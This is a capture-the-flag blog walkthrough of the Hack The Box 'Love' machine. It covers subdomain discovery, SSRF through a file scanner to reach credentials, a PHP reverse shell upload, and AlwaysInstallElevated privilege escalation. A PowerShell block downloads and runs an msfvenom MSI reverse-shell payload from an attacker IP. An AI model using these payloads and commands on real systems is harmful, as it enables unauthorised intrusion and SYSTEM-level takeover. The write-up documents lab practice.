🔎🦶Enumeration/Foothold

Love is an Easy box from HTB created by pwnmeow. This box features subdomain lookup and AlwaysInstallElevated privesc. I start every scan with a RustScan and convert it to a PDF for easier viewing. This is bundled into my setup.sh script which I've mentioned in a few of my other posts. RustScan with NMAP filters shows a website with registration available on port 80. I also notice port 443 is open, so I navigate over to the HTTPS version of the website and see a certificate with some useful information.

Port 80 showing the Voting System screen.

HTTPS Certificate showing some useful information.

Looking at the certificate I notice a subdomain in it. I add the primary domain and the subdomain to my hosts file.

Adding sub-domain to my host file.

I also note down the [email protected] address as a possible username and ValentineCorp as a possible company. I visit both domains over HTTPS and the staging website comes up.

Staging File Scanner website.

I notice at the top of the screen that a Demo link is available. I set up a nc listener, point the scanner at it and click Scan file; I get a hit back on the listener, which shows that the server fetches the supplied location itself, so code execution via RFI or traversal might be possible.

After striking out for a few minutes, my full NMAP scan finishes. Reviewing the results I notice that port 5000 is running a website and returns a 403 error.

Port 5000 showing 403 Forbidden.

I use the file scanner to request the port 5000 page instead. Since the request now comes from the web server itself, the 403 no longer applies, and the page gives up the credentials for the voting system.

Free File Scanner shows the Password Dashboard.

I note down the credentials and head over to the voting page. Upon logging in I note the name of the user we are logged in as and notice the copyright notice for the site says 2018. As this box came out in 2021, I assume the old version is intentional and go looking for known exploits.

Google showing me the way...

The ExploitDB exploit for this version did not get me a response, so I tried the steps from it manually, which worked.

Creating a new malicious candidate.

I created a Candidate and uploaded shell.php, which is a fork of the PenTestMonkey PHP reverse shell. To catch the shell I set up a nc listener.

🔝Escalation

Once on the system I get the user flag, create a directory under Windows\Temp and download WinPEAS to the box. WinPEAS reports that AlwaysInstallElevated is enabled.

WinPEAS showing AlwaysInstallElevated.

I kill the PHP shell session and change its port to 9001. This is because my setup script creates MSFVenom shells that default to port 1234, and I want that port free for the MSI payload. I alter the PHP shell accordingly and get back into the environment. I then pull down the .MSI shell I keep for this privilege escalation.

⚠ Attack Machine

🎯Victim Machine

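The commands from the post were lost in extraction, so the following is an added example (not the original post's or WinPEAS's code) of the check a practitioner should make before relying on this privesc: AlwaysInstallElevated only works when the value is set to 1 in both HKLM and HKCU, and WinPEAS flagging it is worth confirming by hand. The attacker IP, filename and payload architecture are assumptions; the attack-machine side (msfvenom, web server, listener) is shown in the comments.

```powershell
# Added example: confirm AlwaysInstallElevated in BOTH hives, then run the MSI.
# Both values must be 1; if either is missing or 0, msiexec will not install
# the package with SYSTEM privileges and the payload runs as the current user.
$keys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)
$enabled = $true
foreach ($k in $keys) {
    $v = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    Write-Host "$k AlwaysInstallElevated = $v"
    if ($v -ne 1) { $enabled = $false }
}
if (-not $enabled) {
    Write-Host 'AlwaysInstallElevated is not set to 1 in both hives; MSI installs will not run as SYSTEM.'
    return
}

# Pull the MSI built on the attack machine. URL, filename and payload are assumptions;
# on the attack machine it was built and served with something like:
#   msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.2 LPORT=1234 -f msi -o shell.msi
#   python3 -m http.server 80
#   nc -lvnp 1234
$msi = 'C:\Windows\Temp\shell.msi'
Invoke-WebRequest -Uri 'http://10.10.14.2/shell.msi' -OutFile $msi   # attacker IP assumed

# msiexec installs the package with the elevated privilege the policy grants, so the
# reverse shell inside it comes back as NT AUTHORITY\SYSTEM. /quiet /qn suppresses the UI.
Start-Process msiexec.exe -ArgumentList "/quiet /qn /i $msi" -Wait
```

If the HKCU value is missing on a real engagement, the policy is not actually exploitable, even though some enumeration scripts only report the HKLM value; check both before burning time on the MSI.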
Rooted Love from HTB.

Published On: August 5th, 2021 / Categories: HTB, Technology